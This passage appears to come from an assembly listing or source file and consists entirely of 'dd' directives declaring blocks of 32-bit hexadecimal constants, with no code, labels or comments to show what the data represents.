		dd 4B52C3AFh, 11DBAB94h, 60713A79h, 0E2CF48Fh, 911429B5h
		dd 66579AC0h, 0F30C5F1Bh, 5F198262h, 8CE9371Eh,	452CD7E6h
		dd 57C6E5C1h, 47AFBB77h, 5C2572C4h, 8139D043h, 0BBBFB94Ah
		dd 0A71066ACh, 6A45A541h, 0FD1A2014h, 0DBEFB622h, 0DF72C543h
		dd 0B81D0E96h, 59C468FEh, 14A0AA61h, 0FA4A4228h, 3C3174BFh
		dd 5F22C4F1h, 0FCD4108Ch, 0DF105809h, 0E216B435h, 9F7F4260h
		dd 13E94E6Eh, 0BFFF113h, 94458DD6h, 0E749A0B1h,	7B4371B7h
		dd 2A2FEE70h, 3ECF2E0Fh, 190F9283h, 0A0D5D45Ah,	8AB5DBD0h
		dd 0E9BF333Ch, 2B925F83h, 5368FFECh, 0BF77B9BFh, 8A124E7Ah
		dd 1D958509h, 0A92A2410h, 85EDFE58h, 0F44D9FFDh, 842BAB76h
		dd 0F163CB98h, 5E55504h, 648E1494h, 7589FC07h, 155C9475h
		dd 33F83132h, 0FD437F2Bh, 604E370Ah, 754B9EBAh,	0FE714052h
		dd 908510DBh, 0D0427CA1h, 74D5F7FFh, 0FF88BC82h, 9CEA1598h
		dd 105ECE17h, 3D8A9B51h, 7660D286h, 0FAC80DCh, 0A6637D2Eh
		dd 0E3ABEC2Fh, 17AD9381h, 86440EB6h, 84518905h,	0F62D4BA7h
		dd 5C1E617Ch, 0D2AFCB30h, 0CA0CADA8h, 0CE824517h, 9341541Bh
		dd 0BABBFE50h, 0D4387D3Ch, 44438231h, 82EBA76Ch, 0FF3401A3h
		dd 0C4C1F0C5h, 7038A4ACh, 50DCB6A1h, 28C6F4F2h,	3433BA4Ah
		dd 904540D5h, 68C3A806h, 4915512Fh, 566A84EFh, 0DCE1706Eh
		dd 3C369EC4h, 0E63295E3h, 4F9C819Ch, 578BB655h,	0C56827EDh
		dd 0C1C264BEh, 9F6F457h, 5FFBFBF6h, 76A2B065h, 0EA7FA45h
		dd 0E3181238h, 894668E0h, 0AD8C4723h, 0BC7515E3h, 168C8832h
		dd 46ECF441h, 515D2719h, 442055Dh, 7EA2AF84h, 5F6E7D92h
		dd 0C207D88h, 2BC7EBF4h, 45A2998Eh, 4C85D18h, 0C46589D1h
		dd 0A9B7C251h, 0BC7778F5h, 0BAB0983Ah, 0DAF57D4Fh, 0BB392895h
		dd 0CD027D7Bh, 149980Fh, 343FE715h, 0E9FA0168h,	0BE135BD0h
		dd 3C3B878h, 0E83114C6h, 5FD51F37h, 914DBFB9h, 34477C5Fh
		dd 0C8F92086h, 3E0F7DC9h, 9D5A0578h, 5095E7C0h,	0EFFCE931h
		dd 0A3354FB4h, 599F6E16h, 72BD12ADh, 7C3DC34Ch,	74627C79h
		dd 36BA71D7h, 0D7D256Bh, 83994243h, 0AEBBA161h,	3F17E2ACh
		dd 14CF9B16h, 5B73F522h, 0F3A491D9h, 5220300Fh,	0E0423100h
		dd 8470C031h, 0A4A2040Ch, 0F3F53E36h, 881AFEB2h, 780869CAh
		dd 0F3C8FDC0h, 76E655C1h, 1397F7C6h, 0C2F8566Fh, 0D5C1415Ch
		dd 0DF3E2EB0h, 9443081h, 0E7308F4Dh, 64AD93BEh,	95807835h
		dd 25425022h, 8C4F4356h, 75343566h, 8B9A002Ch, 5FCAA009h
		dd 586FCE14h, 7A16738Dh
		dd 0AC728399h, 814206Bh, 2A08DD1Ch, 0E9793632h,	0B07CB517h
		dd 0B1B82D2h, 0CB54AF05h, 2B327C16h, 0E997C4Eh,	0F30BB3D4h
		dd 446DB5B4h, 203F0775h, 17DF8230h, 0AA04FD3Fh,	0E1E0A585h
		dd 0C778631Ah, 7CFDA522h, 5D8CC42Bh, 566476E6h,	6BC0C86Eh
		dd 88527D11h, 3E77F985h, 0BD6429D8h, 2CB8828Ch,	0F0C652B3h
		dd 43179420h, 0FCB1D303h, 38E3181h, 0CA4421C0h,	1EB87B45h
		dd 9374AD78h, 0D03FDE17h, 0DCA09584h, 8A30C44Bh, 0E37733B0h
		dd 0E9D3319Fh, 0EB50383Bh, 5ABE3521h, 1625C4C4h, 0D72F3Dh
		dd 0D3C1436Eh, 45662188h, 0FB0D217Eh, 0ACB120D2h, 0BE42B515h
		dd 5BF87892h, 1A1E1F3Dh, 0C7B4AED0h, 2B868668h,	93BED091h
		dd 324DB1FCh, 23A8C84Ah, 0DF62C499h, 57455C29h,	0D17E1F8Fh
		dd 9D409895h, 0DD2B0C94h, 0C9819C06h, 190E23B8h, 6467D163h
		dd 0DE48221Dh, 0FFFB9F53h, 4FCE421Ch, 204A4D47h, 31F7C4BDh
		dd 0C7495355h, 0B176EBAFh, 78C25CCEh, 0D1024CDFh, 0C5551D73h
		dd 0FD0F03DCh, 6F810BBAh, 0F1480261h, 40D5EF33h, 0F8A93125h
		dd 0D21C0AA2h, 4560918Ch, 0F36D1F31h, 85F1E09Dh, 1374993Eh
		dd 0A29690ABh, 0D67CAB2h, 0D1E342E8h, 0ECD8A6FBh, 5CB3553Ch
		dd 3503FE33h, 5C402E73h, 44D92B79h, 49337B4Bh, 664FAE30h
		dd 13857BDh, 66AD4638h,	0C8B466B4h, 728262F3h, 3310EFFDh
		dd 4C4C15FDh, 0CCF59084h, 0B3A3E5E8h, 0ACACC7D9h, 266BCCD7h
		dd 8ACC8F1Fh, 17CFB156h, 7BCB4CC7h, 3346A45Eh, 7CC5F2C8h
		dd 8C71D034h, 0A439C367h, 99715416h, 74119727h,	0FC5F7DEBh
		dd 4CFB1DB8h, 249A3848h, 98346D9Dh, 4FB4771Dh, 0AD576C8Ch
		dd 0A36C3F19h, 4BBA3749h, 3167C0D3h, 7476A7D1h,	3CFABF9Bh
		dd 3288E45Eh, 38FA162Ah, 317F9636h, 0B03D5B2h, 3F6B6841h
		dd 843165F0h, 7391D3B1h, 0F75958AEh, 0BE63CC8h,	0C39F5C97h
		dd 3155358Ah, 498523E7h, 0AA019EF0h, 524FDF58h,	835A5974h
		dd 0E82E31Bh, 0B3237C55h, 4FE7696Fh, 1AAFB726h,	6E9F5101h
		dd 3D9F9958h, 6F928C45h, 31267ECCh, 0B18EF0E9h,	335D42CDh
		dd 0FF265012h, 5D44F060h, 0F931AEA7h, 214814AAh, 14093598h
		dd 0AC158FAEh, 9AFB120Bh, 8A2823B1h, 0B2488CC2h, 9B4A5FA5h
		dd 0A288BD4h, 13F77808h, 75415F54h, 10446A62h, 0E3D51729h
		dd 5E5B5572h, 8FE2476Eh, 0AED5CECDh, 0CB9D8A16h, 0B9B044F5h
		dd 9368191Dh, 8D54745Ah, 2E7F4290h, 0DF37455Fh,	0B15962Ch
		dd 51425E7Dh, 0F343195Ch, 42FF798Bh, 0A11D5C51h, 945A4BA6h
		dd 9584B9D6h, 8F44A88Fh, 742B77AFh, 18613B33h, 518D6EC0h
		dd 35D91086h, 0D327267h, 0C5CD255Ch, 4F330CD9h,	0B400E319h
		dd 0EA2E0031h, 333CD42h, 10CA3680h, 7A03886Ch, 50975D57h
		dd 1892DE25h, 540A3912h, 0BA439ACCh, 4AC27920h,	8AC10AC2h
		dd 6EB00AC2h, 0AC960AC3h, 0B8C3A17h, 985CCE60h,	2F329F9Fh
		dd 2D413F0Fh, 238AAB81h, 3D309813h, 2AFBE460h, 35CC8FC7h
		dd 7DD67783h, 214852BDh, 99D32C49h, 0A2884AA4h,	0FAF8A80Bh
		dd 0D9E13ACh, 70BEEBBDh, 0D21A8A44h, 0BC2578ADh, 0BCC50498h
		dd 5EB966FEh, 0E330DCEFh, 70579410h, 32C04631h,	9AC4D13h
		dd 97451202h, 5176CB0Ah, 0A3A38C53h, 6B67D4B0h,	0A4A0A2D1h
		dd 0AC9292BBh, 2BB9ACB4h, 87E375C3h, 0EC2B3343h, 440A9FC8h
		dd 0C26045BFh, 338FD8C0h, 0DAA8965h, 0C0D29401h, 0D8DA0DEBh
		dd 0D8568B42h, 787E8BD9h, 0FC5F3972h, 0EB431AA4h, 4055A30Ah
		dd 20B3F095h, 29AC13C0h, 64D524C8h, 0D71A0CDAh,	6FE5881Bh
		dd 36919E4Eh, 299F59F3h, 0AB879B9Ch, 0B988C0BCh, 0DE328883h
		dd 0E5F78BF7h, 46D51805h, 9FB1C4C2h, 478BD498h,	24442961h
		dd 34848C1Eh, 0B8379403h, 0C1D1E4DEh, 1D8CFE9Ah, 551A74FBh
		dd 303C0B4Fh, 27AF168Ah, 8CC097DFh, 0CB717608h,	963D01AAh
		dd 0A8636E14h, 0B1344132h, 195D4A7Fh, 0C1EDDD63h, 5F65F1BBh
		dd 0FBFF5090h, 4277F23h, 0D778EA11h, 896784Ah, 373033A1h
		dd 7AC87C1Dh, 40800590h, 6340194Ch, 0C43613C5h,	9319C618h
		dd 0EDB87E65h, 9430E422h, 28C766E4h, 0B87FAA73h, 3345B560h
		dd 2C7F7AFEh, 66AAD28Eh, 0F854FA4Fh, 0D9623AA7h, 0D1A88178h
		dd 0EE76FA20h, 2BA957E2h, 8AC49A4Dh, 0D2EC1611h, 7DFBE58Bh
		dd 903F7F01h, 0F4F6C16Fh, 4824F1C2h, 8CB5472Ch,	89F531ECh
		dd 50A61AA0h, 51D2D66Dh, 0C7438687h, 0EF8730BBh, 0C931C4F5h
		dd 0FA90F667h, 82C61963h, 8DA65ACCh, 181FFBE1h,	28164C7Ah
		dd 4B1FCD42h, 0F5C117F8h, 1041F9E3h, 0E1B87735h, 339A1E0Ch
		dd 0D1985852h, 2CCD56D8h, 65371B3Eh, 34FC2331h,	8A636834h
		dd 3CE104FDh, 0D1D9E8FFh, 0EDA5EBAEh, 4E4B5ECAh, 231FD471h
		dd 5F7EB7Dh, 0C28045F6h, 1753EC40h, 18430A34h, 0ACCC0041h
		dd 36424884h, 6B1C727Ah, 0F5BCA9EEh, 0CFD039B0h, 0AC0F3118h
		dd 0B8BB16EFh, 46B15DB7h, 6A09AB7Dh, 68808DE3h,	54DFB7D8h
		dd 580D3208h, 14BAA32Bh, 0CC4A2201h, 2408C12Ch,	43609C40h
		dd 7D295CA2h, 0F1AA6B83h, 107503C1h, 621C853Ch,	0C915E5D8h
		dd 38D85760h, 9B037147h, 68B2BEC5h, 0A1DF3B58h,	0FBB81728h
		dd 18B99E36h, 18AC5892h, 41663747h, 0A9C2ABA7h,	39CB1FB7h
		dd 6C179A40h, 0BB0EB36Ah, 0C27853D9h, 9F0685CDh, 27D7DB49h
		dd 184547CFh, 918D771Ch, 82F13F20h, 7FB9E42h, 37E98A93h
		dd 0F8238082h, 0EFDA002Ch, 0AC051BFEh, 0F778233Ch, 721086E7h
		dd 4F53689Dh, 6C2FE232h, 1FA3F956h, 0F31526EBh,	0A2ACFDCFh
		dd 82257A5Fh, 0BF10CA9Ch, 3669C390h, 4970621h, 9A2708F4h
		dd 0A9F035D8h, 0C2117D1Bh, 9A5C98A1h, 48B4A2F3h, 39D110B4h
		dd 9812CACh, 68603B8Ah,	0B75E446Eh, 8BA86631h, 880DC71Eh
		dd 4DC0758Dh, 5E960A55h, 72FCF938h, 221B24C6h, 0F0E1519Ch
		dd 0A0DBC4C1h, 47510158h, 0C840381h, 0B886D440h, 7F2BE0ECh
		dd 0FE635A4Dh, 0A9DF1756h, 4CEC6390h, 111D694Dh, 0C4D7A262h
		dd 0A1D64EC8h, 0CEA7BF8Ah, 0B6E87FE0h, 3E67D215h, 0A3410AB2h
		dd 16C80170h, 24EB06EFh, 3750F946h, 5FF103A5h, 3C0BD392h
		dd 2D85D81Eh, 0A76C80C7h, 0C7FEFFDFh, 6B29681Dh, 74C71BA9h
		dd 538342EAh, 0F57B46CAh, 0B42FE981h, 9DC33EFFh, 0FB13E207h
		dd 53CEBEA8h, 0BAE01BEh, 2C5F5306h, 5A5A4020h, 0B35FF940h
		dd 0BE7F9CC0h, 0C5116878h, 0FFBEDFB2h, 0E974F181h, 0F51CE8Eh
		dd 8AA96F4Eh, 0B446DC14h, 0F2FE4E8Dh, 5F3C31h, 80A3B51Ah
		dd 0A7460DF8h, 0D121D389h, 6C046755h, 3F853F75h, 1840D83Fh
		dd 0E9698C0h, 0BBC45973h, 5B2E6220h, 0F8C14265h, 18BAA02Bh
		dd 43AC9800h, 0A98FCCC2h, 1CB77CBCh, 2368D0BBh,	16AD680Ah
		dd 0BCCC1722h, 4262CB8Ch, 871A7F86h, 45E18FEBh,	0DA501CC3h
		dd 0CCDF0029h, 0D0D50BAh, 0E3D6CC50h, 0A654D738h, 0C5E3387Dh
		dd 42FF01C1h, 0CA04312Bh, 3BD70041h, 0AF828BEFh, 671C1A2Eh
		dd 520AF565h, 0A0EA5C09h, 0CF810181h, 4CB4C660h, 6D9FCC75h
		dd 223C87E1h, 1FB7D7E9h, 0AAF2C6C0h, 8E3C50F0h,	0FAA2B83Eh
		dd 616ABE75h, 0FEDBE517h, 53748F4Ch, 371E8697h,	1C0BB831h
		dd 25578AD6h, 92D190F0h, 0DC89039Bh, 0E121E8BBh, 60E28BBEh
		dd 328F745Ch, 8CA143C0h, 8A50A13h, 0A8427BBCh, 0A4915E0Ch
		dd 0A824F98Dh, 23EFA2CAh, 2B427320h, 7D2D4A45h,	0E962CE96h
		dd 21BC9A50h, 1181F90h,	573F256Dh, 3EE7E155h, 72AD56BAh
		dd 0BB2EE6F4h, 0E0F657C6h
		dd 0D5BFA5F7h, 0BD324362h, 90AD8394h, 0F66A248Fh, 0D28DFC17h
		dd 0F4395392h, 0D14BC6A2h, 4D2E8021h, 54BAA497h, 0D2ECA25Dh
		dd 4BB5C975h, 0B73F25D9h, 166CFB43h, 94BA5252h,	0D438D29Bh
		dd 70F341B8h, 402614B5h, 74620062h, 2D2E1D27h, 0C952C1ACh
		dd 49AC7CA7h, 0DBB7B608h, 94D0D219h, 10D8A82Ah,	1013ADFDh
		dd 3802483h, 0C9820149h, 2B0B8081h, 0F8361052h,	55F84D58h
		dd 0C9CDED8h, 12389A37h, 0CF31A4ECh, 0CBA4E130h, 0E8C70410h
		dd 0B07B3FEEh, 0F3295403h, 58D74781h, 4E0AA2Ch,	15BC489Eh
		dd 277628F0h, 31432063h, 0E4C08EC0h, 968E4340h,	0D1840F65h
		dd 95738258h, 5C05B545h, 518860E6h, 0EB956121h,	0C166A0Bh
		dd 653B5A39h, 0A4672BD0h, 62FBC462h, 4C42D8E5h,	8034369Eh
		dd 0E3339AE2h, 877BB21Ch, 0E053F803h, 43F0FD6Bh, 0F3D971B8h
		dd 4402CF6Eh, 0F37FC1FCh, 68DA318Eh, 0E543D964h, 0F6F00666h
		dd 375FBEFBh, 0C4D57E9Bh, 2EBE1B6Bh, 0CF137D45h, 2DA86698h
		dd 7E13E244h, 0FE9B1988h, 0D8255CA1h, 0C2D9950Fh, 0B98CB314h
		dd 9FA205D6h, 62F9B82Eh, 91C19FAAh, 0DFFB6E9Dh,	2A1EFDC0h
		dd 371A02Fh, 72A13194h,	0CE5C92B2h, 0BF8AE019h,	1467A278h
		dd 338C1C44h, 0CC58050Fh, 0EF2D2A99h, 403DF26Dh, 0FBE52703h
		dd 0E54805B9h, 0FFC00E34h, 5538FAC4h, 39D1D9B8h, 9993F954h
		dd 0D824C85Dh, 850C3AD8h, 4075D5Eh, 24FD1C0Eh, 9EA8DFE0h
		dd 2B4052h, 220875DFh, 9E3C50EAh, 0D78A9E82h, 538AC545h
		dd 1D37D095h, 3EEC8E8h,	0FFFD58EDh, 6E270B17h, 0E4274BBAh
		dd 0C4643929h, 95350E75h, 0C4D484D9h, 88539024h, 9425DC91h
		dd 0B9223812h, 28260EEEh, 0F1744C92h, 0A875BC8Ch, 444DCC6Bh
		dd 0A7019A46h, 2AA7E349h, 0DC043C5h, 1D809A3Eh,	0BF56FA4Dh
		dd 48ABB9B0h, 575031B5h, 3E1424E5h, 0C4342538h,	52EC2164h
		dd 650F0637h, 0FFF85A13h, 0D6C170D5h, 0CDE5F5Fh, 0BCEFD972h
		dd 0E87C9348h, 980EEA1h, 154C9132h, 43DDB18Bh, 6A124DDDh
		dd 0B05020E8h, 0FB8AD625h, 945D57AFh, 70103923h, 7D6F201Ch
		dd 2A872844h, 44FCF888h, 4903B316h, 5987272Eh, 694313C3h
		dd 0C2FF46CAh, 6FDB6FFh, 0D2374D9Dh, 0A870C051h, 0D46AD682h
		dd 50F63701h, 0A930C054h, 0DA468E16h, 0F7ED2A97h, 28DA2FA1h
		dd 1F0B3146h, 0B8A19BC8h, 86DEECCBh, 4B69F09Bh,	0EBDE2614h
		dd 0D9E6A50Eh, 50A228C2h, 6F04028Fh, 75E7311Ah,	0A128CFE1h
		dd 510BAEA1h, 2E77D47h,	7D1F2303h, 0E48C4528h, 0B231A453h
		dd 0D2705D2Fh, 143E744Fh, 27D94CD0h, 0CE7090D2h, 0A1ED13E4h
		dd 0A057CC40h, 836B554Dh, 4E85C003h, 83CCE262h,	0EAF5F040h
		dd 0D99CD479h, 0F0B68382h, 0C020AAC7h, 9E066ECAh, 4616A1F0h
		dd 0A75AF8CFh, 9DD51F30h, 4B34FFAEh, 97538B03h,	0FBB6427Dh
		dd 1F822E27h, 0D1579812h, 0CAF0A529h, 0D1355ED2h, 0C6E9C7A1h
		dd 0B4CACE69h, 1E5093F9h, 0D3EA1C7h, 0BE9F5E35h, 0EC30ACA6h
		dd 535DE445h, 8B4235F5h, 889F5BD4h, 8DE1A71h, 251D2B22h
		dd 4648834Dh, 64621AABh, 797AD221h, 9140E895h, 34CC0C98h
		dd 74EA89ECh, 0D1D0D0A0h, 5DC02F95h, 0AEB6BA6Fh, 0AFC780C6h
		dd 929B9034h, 0D334D1EAh, 770D08D2h, 7695F555h,	378A39B1h
		dd 5B173036h, 2D3B6907h, 0DA44704Ah, 1842EF25h,	450DDE26h
		dd 4694B08Ch, 0D009C25Ah, 4E3F56DDh, 456621ACh,	278F9153h
		dd 78D24AC6h, 0E44AC5FAh, 0DB858A92h, 0C533EA3Dh, 0AAD9F691h
		dd 92722C9Dh, 0B53D60D2h, 0BED140B4h, 3EFD8166h, 48193167h
		dd 14D486EBh, 51EFC694h, 34A02257h, 48D958A1h, 0AAF7A520h
		dd 1A4F1D0Eh, 0A34AAA6Ah, 4656FE98h, 0A34D1A4Bh, 167D4366h
		dd 528E2560h, 68F59A4Dh, 0D1948ACAh, 75E0CA3Ch,	0E68DBBC9h
		dd 0A6D716Bh, 0CB1D31A3h, 0E4A1EB8Bh, 67E5BB93h, 30D3D318h
		dd 2063C40h, 0EA1E61F9h, 33EB9B2Bh, 0C53C02EEh,	0B05C3068h
		dd 0FA3179CDh, 6F9B2BB6h, 855D422Ch, 0FDFF40A8h, 72282650h
		dd 52FF2602h, 44D7C620h, 0BCE2742h, 7012D94h, 58F2350Ah
		dd 93025250h, 29540514h, 0A8ADA834h, 8BF63F6h, 21D06569h
		dd 7E240C5h, 1C23E43Dh,	0FF3D146Ah, 735503EEh, 1215770Dh
		dd 2F05BC5Bh, 0D70F7C8h, 0BFF51986h, 0EC007D10h, 71FA6B7Eh
		dd 807B8660h, 750B0DA7h, 3ED8834Bh, 0ACD1600Eh,	7B035994h
		dd 24624FBFh, 852E657h,	0AD50FD28h, 0A68A9E3Eh,	193F346Dh
		dd 2F0247E7h, 0E8C27C2Dh, 1ECFC5E5h, 0F82FD3A3h, 0DD40B06Dh
		dd 31B5EF98h, 2FA2C2F0h, 0B487A823h, 0AD3E89A9h, 3791E3B6h
		dd 38893320h, 1001ECB1h, 680C0EEBh, 8C241F6h, 1E8C6C3h
		dd 0A46CF941h, 63A6F71Dh, 484B5A06h, 48DFB1B3h,	0B9C12C4h
		dd 0F8F996AAh, 0D296435Eh, 6790AE40h, 792FBE3h,	0E6292681h
		dd 0D7199474h, 0FC229F48h, 29B8E444h, 0A1CA1CA1h, 72311F0Bh
		dd 84EF0850h, 0E805B149h, 0E609ACA0h, 6F312F42h, 552103Ah
		dd 78E16697h, 2CB47EAFh, 42A94DE3h, 1C190E31h, 0D0FDB0h
		dd 0F63D834Ah, 86B7623Dh, 9EB7EC2Eh, 45F5CA38h,	14B6938Dh
		dd 0B8A8ADD8h, 0E4D6D302h, 64A01949h, 0E898FB0Eh, 0E5A0E07Ah
		dd 39809DCh, 0B1AE938Dh, 402A52CCh, 3305CFEh, 6107361Ah
		dd 2AEC4A1Bh, 1121FA07h, 5E22601Ah, 8D44FBEEh, 16EAB05Fh
		dd 0C61780C1h, 30BA8C62h, 0B3B381F1h, 80C143h, 575B73FBh
		dd 0C7EA7373h, 0BFDBF19h, 0E2860227h, 0CE49CA37h, 2BD9430h
		dd 0E4745042h, 0F6E1728Ch, 0DA28CF81h, 0AB1DC418h, 8040030h
		dd 0F218722h, 88210511h, 907D0244h, 287B0144h, 0B605D54Eh
		dd 0EE959000h, 0E5558BE5h, 0B4116826h, 426DB7CAh, 0A77C1A55h
		dd 0B2BC0CC5h, 4E1AE2B0h, 0D155ABACh, 8C41AB22h, 1A0D590Fh
		dd 0E0D85564h, 2D406A1h, 0B068BA43h, 0D7022E6Eh, 15E05F1Bh
		dd 5D022BC2h, 81E67CAFh, 12076620h, 0CF8023AEh,	0F0B7955Ah
		dd 151CA17Ah, 8218631Eh, 288303Ch, 21126130h, 0D4AA1224h
		dd 22602C1h, 860BB50Eh,	2F95FD88h, 8D984E3Eh, 0F3BEBE62h
		dd 372D9123h, 96047B13h, 648123A8h, 0E720CA02h,	1F4505F3h
		dd 898A75F9h, 0B40BA51h, 8853BD5Bh, 0F862B18h, 0DC368249h
		dd 153A8AFh, 0ADD03D0Ah, 0AC4A6500h, 0CBEC862Ah, 0C5C199BEh
		dd 81AD4095h, 0D327AE64h, 8432510Ah, 528819CAh,	9099186h
		dd 5950114h, 604C0224h,	90FD0483h, 2A6FB14Ch, 0B2E3BBB4h
		dd 0A746D565h, 40ABEF58h, 134C51F2h, 52502EC9h,	0AE142AFCh
		dd 5438BEAFh, 73CD57ACh, 631AA021h, 0D01E64F8h,	72D98708h
		dd 0A20C02D8h, 0CC69943h, 883C2D8Dh, 0ED3AA48Bh, 131F4970h
		dd 833B123Eh, 91CAE42Fh, 23B62EB8h, 0ACCEB90Eh,	0DE050512h
		dd 66D81543h, 64A10887h, 0A7B8020Ch, 3A0C648Ah,	5D1CC620h
		dd 0C5425D64h, 7D318924h, 419F3AA2h, 58C27CB4h,	2E39C812h
		dd 0D59FFCE1h, 794DE471h, 0F2077657h, 8BFF950Dh, 2A0B0827h
		dd 56672AACh, 702F8F0Ch, 55EBF6C2h, 8B542C56h, 100436A4h
		dd 42C9D73Ah, 8125B044h, 80BB1E44h, 98131044h, 0D8BEA0DAh
		dd 0A0244D5Fh, 952546F5h, 0CC70622Eh, 9322040h,	6EB10868h
		dd 73E4B273h, 42C56095h, 44DDA1C0h, 9236CE19h, 44B6B3F4h
		dd 0D3F07ECFh, 0BCB537D0h, 315E2FEFh, 53424770h, 0DA438ECCh
		dd 8CEB002Eh, 91B282EDh, 0FBF417D7h, 0A166A612h, 883A8BF5h
		dd 95DAD670h, 286EF168h, 0BD2C532Fh, 3664A0CBh,	89280299h
		dd 2F23EB19h, 5A5F48ABh
		dd 0BC71999h, 98CF2BABh, 0A1A465F1h, 0F1F7E348h, 0BC65197h
		dd 47E58B9Bh, 3491660Dh, 11E66063h, 8CD42746h, 0E365911h
		dd 98C08331h, 9D1CD075h, 0F949CE8Dh, 8CA3E95Ch,	40A3C653h
		dd 133E709Ah, 87DC857Ah, 31168B47h, 2411EB2Fh, 0F488D8A5h
		dd 0D69FDF88h, 0AE0A70D5h, 0A53AF65Ch, 1DFF9BF5h, 3BD93C07h
		dd 9DCA063h, 1908C4CCh,	0A8CF2080h, 4C0587E1h, 4F836353h
		dd 125E60F9h, 94EF88BAh, 3F142FE8h, 0FA2AD5CDh,	1F358DC2h
		dd 9277B9E0h, 0BEFB39ABh, 0D7509D89h, 0F6970EFDh, 1214C60Bh
		dd 974A8BE0h, 0DFD965A6h, 0EBE3EFC0h, 0E9DF46C8h, 6A086791h
		dd 8BC9F857h, 30BD0682h, 40D5FB58h, 99C58BB4h, 0AC39D358h
		dd 83DDD234h, 0F2CC22A5h, 5D09BA1Ah, 4673108h, 0ABF4D043h
		dd 222B07F2h, 0D958C6C7h, 72CF9A41h, 4AC36D47h,	0FE801629h
		dd 50102C97h, 2C6CAC44h, 0CDF8981Fh, 4F23327Eh,	0C541A465h
		dd 0E486B46h, 1C8589ECh, 2549907Eh, 0F2B0F7B1h,	912CDE07h
		dd 233BBC77h, 0FC0B6CD2h, 0EC4CF8A9h, 28C661DDh, 6D3D1046h
		dd 0E7A5944Ch, 179A48EEh, 0B286F945h, 0F5760188h, 55031E3Fh
		dd 87F2B985h, 57DBFA1Fh, 627D3F34h, 0A910D726h,	0B253A23h
		dd 0DF84C48Eh, 814867E8h, 0B788B31Fh, 66845F3Ch, 0E52FB605h
		dd 3965235Eh, 755F3BC9h, 0B0A23CBAh, 98625B95h,	88D13975h
		dd 0F26FC021h, 28CA8203h, 979E9CC9h, 27EFB18Dh,	1E3791CDh
		dd 4B3006A3h, 62505D4Ah, 9D07BCB6h, 0D10A112Eh,	52363873h
		dd 9760A394h, 812AF8BCh, 0AEF1ABE5h, 0A9389DD0h, 351C58F2h
		dd 121E16A8h, 7EEBB958h, 95318F14h, 14825E7Dh, 1EBB5544h
		dd 85574CB8h, 0A7D93A9h, 55490F12h, 7C6287B9h, 7DE32667h
		dd 980A303Dh, 61ECF5A0h, 0F148B2C6h, 0D73D813Eh, 2FC6040Ah
		dd 58F6A88h, 2589A956h,	18F802D1h, 7B00DAF7h, 13C48BEFh
		dd 0EB503212h, 41289EBAh, 0B7AA0C61h, 0B56C095Fh, 5DCCA80Bh
		dd 987C5FE1h, 2E11F6C2h, 0D657D446h, 6AE45426h,	0AC0172C4h
		dd 0C8D60934h, 671BCBA1h, 4E18AA4Dh, 7A55BC92h,	9805D2BEh
		dd 0DB0C5BCDh, 212B7953h, 0DD058605h, 0C8244470h, 84A55DE3h
		dd 15D60232h, 22894Ch, 0D11B5EDBh, 720B8B6Eh, 0F398A522h
		dd 6C1C10CDh, 0C6B954A9h, 19BC6697h, 0C31CDFDh,	0DC88D218h
		dd 4F170604h, 30A22514h, 3D72A67Ah, 0B9502A55h,	0E125B363h
		dd 9DD24950h, 0EB3CBD4Dh, 0D7AE145Eh, 0EC1ADC0Ah, 6F46282Eh
		dd 0D821B8C0h, 0EBE83D64h, 0AE70DA21h, 0B00E0B13h, 218C005Ch
		dd 44B14413h, 57908755h, 0F0BF6AEEh, 352CF643h,	492085FCh
		dd 103F4D72h, 7B465752h, 4E6BF302h, 22AF4C58h, 6A87F3BCh
		dd 0DACD18E4h, 0B8008BE1h, 0CE084B31h, 0D7AE82C1h, 59608595h
		dd 82BBA17Ah, 2C5FB688h, 6650D0F5h, 52A146EDh, 32856658h
		dd 0C15D6894h, 0E9C2038Ch, 0E6D4E885h, 0A316BEC3h, 6273C824h
		dd 2725C4B6h, 2C578AEFh, 4C5EAFB7h, 99CF79FBh, 13680C73h
		dd 8A670668h, 646A0123h, 10053E54h, 171B2567h, 0FC5F0581h
		dd 23FFB41Bh, 5E9F19Dh,	8DF093A8h, 7880BDA0h, 2C0F7CCCh
		dd 0C0845049h, 9C751220h, 8B01FD1Eh, 80022F40h,	3E9ECC8h
		dd 0C207049Dh, 0B3C97F2Eh, 92EEC164h, 7912DF19h, 36238798h
		dd 0C8C2BFFBh, 0A24952A0h, 6962C0B1h, 7C70902Fh, 15DE6ACCh
		dd 903F4A48h, 0C7CAE791h, 0F2E35268h, 21FFC5D8h, 0C74237C0h
		dd 0FE66210Fh, 0AEB4DF6Ah, 0FA2AFC22h, 72E0FB8Ch, 304D31B8h
		dd 0B8C729FDh, 5669C575h, 0DFE618DCh, 5E21EF18h, 8C9220ACh
		dd 76281313h, 0C8C72B1Ah, 0F31C36Fh, 74CC8662h,	9046BECCh
		dd 383E7169h, 836C68AFh, 835366Ah, 5E03F2E8h, 3C3AC679h
		dd 5B82F863h, 18C4DC34h, 0F92C962Fh, 167AD35Ah,	28AA8A9Bh
		dd 0D464D534h, 99EA4D13h, 2F913D5Dh, 0EF56D481h, 0BA614A6Fh
		dd 9E96AB23h, 81A7C980h, 0FD20CA50h, 27410BFEh,	0A0FAC689h
		dd 51EF8181h, 1534C118h, 0D0F14844h, 0EC6F7F4Ah, 928B24A3h
		dd 6F7896EBh, 1CA80C57h, 0E0BBC2FFh, 55616C6Fh,	0A025C492h
		dd 0BA70139Ch, 0F010BBE3h, 31396E5Eh, 0B044BAC4h, 4239523Fh
		dd 0AB63E3E1h, 5F6A44AAh, 3A674221h, 0C6837D99h, 0CA8EEBBCh
		dd 1D3EDD40h, 52F9C330h, 192A8B82h, 6D022A80h, 9BB7ABB0h
		dd 411B14Eh, 55CB4557h,	4B818136h, 0C1EB4452h, 99B3768Ah
		dd 0B2364213h, 2EE12A2Fh, 0A3D05598h, 9102078Dh, 9723C459h
		dd 0A8A446ADh, 20A9B64Eh, 0FA299B4Dh, 0AAEDA4C0h, 890033EDh
		dd 38E07287h, 52C9E924h, 5053314h, 8329670h, 23347260h
		dd 1892C555h, 1CD46379h, 86514FB0h, 0BAACED10h,	0C4CCE6D1h
		dd 25250E96h, 5A087765h, 0CB6071B0h, 0A451C479h, 0E54E3898h
		dd 204B0DEAh, 0B666C081h, 92B75600h, 0D8938DE9h, 2460F486h
		dd 8A93A4CDh, 0B8EDA55Ah, 0A6D98159h, 19492DE1h, 0BFC26142h
		dd 846C0258h, 73499B89h, 8674B519h, 0FAA6E256h,	0F298D18Fh
		dd 12F9AFA7h, 0C6048CE3h, 55B67531h, 0A76A49EAh, 68F4BA3Ah
